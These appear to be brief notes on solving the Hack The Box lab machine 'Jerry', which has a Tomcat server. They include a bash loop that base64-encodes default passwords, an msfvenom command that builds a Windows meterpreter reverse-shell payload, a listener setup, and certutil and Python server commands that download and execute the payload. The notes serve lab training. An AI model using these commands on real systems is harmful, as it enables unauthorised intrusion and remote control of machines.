Jerry HTB



  • Using burpsuite we find that the password is base64 encoded:![[2024-01-30_17-04.png]

  • To do this for all passwords we need a bash command for cred in $(cat tomcat_passwds.txt); do echo -n $cred | base64 ; done ' where tomcat_passwds.txt has all default passwords


  • use msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 -f exe > meterpreter.exe for creating the payload

  • listen using exploit/multi/handler

  • To upload the payload host a http server with python -m SimpleHTTPServer 80 then use certutil -urlcache -f c:\users\administrator\desktop\flags\meterpreter.exe in the shell and execute the meterpreter.exe file.

  • Then we get a meterpreter shell `

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